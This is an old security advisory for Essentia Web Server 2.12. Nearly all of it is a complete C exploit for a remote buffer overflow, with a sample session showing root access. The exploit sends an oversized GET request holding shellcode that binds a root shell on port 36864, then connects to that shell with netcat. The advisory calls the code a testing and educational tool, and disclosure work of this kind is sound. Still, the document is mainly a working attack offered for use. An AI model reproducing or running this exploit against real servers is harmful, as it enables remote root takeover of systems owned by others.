|
|
|
|
| |
| The Essentia Web Server provides Enhanced Web Application and Communication Services. A security vulnerability in the product allows attackers to cause the server to crash while executing arbitrary code. The following exploit code can be used to test the system for the mentioned vulnerability. |
| |
Credit:
The information has been provided by B-r00t.
|
| |
Vulnerable systems:
* Essentia Web Server version 2.12
Exploit:
/*
Title: Remote Buffer Overflow in Essentia Webserver.
Author: By B-r00t <br00t@blueyonder.co.uk>
Date: 04/07/2003
Reference: http://www.essencomp.com/
Versions: Essentia Web Server 2.12 (Linux) => VULNERABLE
Related Info: http://www.securityfocus.com/bid/4159/info/
Exploit: essenexploit.c
Compile: gcc -o essenexploit essenexploit.c
Exploit binds a r00tshell to port 36864.
Tested on Redhat 7.2 & 7.1
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
$ telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Jul 2003 11:19:39 GMT
Server: Essentia Web Server 2.12 (Linux)
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 757
ETag: "f104b5-5f2-0b7940f3"
Last-Modified: Thu, 03 Jul 2003 20:53:04 GMT
Connection closed by foreign host.
$ ./essenexploit 127.0.0.1
essenexploit by B-r00t <br00t@blueyonder.co.uk>. (c) 2003
Number of bytes sent: 2057 / 2057
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
localhost.localdomain [127.0.0.1] 36864 (?) open
uname -a; id;
Linux RedHat7-2 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
ENJOY!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define EXPLOIT "essenexploit"
#define DEST_PORT 80
#define NOP "A"
int main ( int argc, char *argv[] )
{
// Vars
int socketfd, loop, bytes;
struct sockaddr_in dest_addr;
char *TARGET = "TARGET";
char buf[2100], *ptr;
// Big fat slide NOP so ret should be good everywhere!
char ret[] = "\xe8\xc5\xff\xbe\xe8\xc5\xff\xbe";
char shellcode[] =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);
if (argc < 2)
{
printf ("\nUsage: %s [IP_ADDRESS]", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 \n", EXPLOIT);
printf ("\nOn success a r00tshell will be spawned on port 36864.\n\n");
exit (-1);
}
setenv (TARGET, argv[1], 1);
// Build buf
memset (buf, '\0', sizeof (buf));
ptr = buf;
strcat (buf, "GET /");
for (loop = 1; loop < 2033-sizeof(shellcode); loop++)
strcat (buf, NOP);
strcat (buf, shellcode);
strcat (buf, ret);
strcat (buf, " HTTP/1.0");
strcat (buf, "\x0D\x0A\x0D\x0A");
// Socket
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("\nsocket error\n");
exit (1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
perror("inet_aton problems");
exit (2);
}
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
perror("\nconnect failed\n");
close (socketfd);
exit (3);
}
// Wallop!
bytes = (send (socketfd, ptr, strlen(buf), 0));
if (bytes == -1) {
perror("\nsend error\n");
close (socketfd);
exit(4);
}
close (socketfd);
if (bytes < strlen(buf))
printf ("\nNetwork Error - Full Payload Was NOT sent!");
printf ("\n\nNumber of bytes sent: %d / %d\n", bytes, strlen(buf));
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ...!\n");
sleep (3);
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
} // end main
/*
Shoutz: Marshal-l, Rux0r, blunt, macavity, Monkfish
Rewd, Maz. That One Doris ... U-Know-Who-U-R!
The doris.scriptkiddie.net posse.
Author: B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> (c)
"If You Can't B-r00t Then Just B#."
ENJOY!
*/
|
|
|
|
|
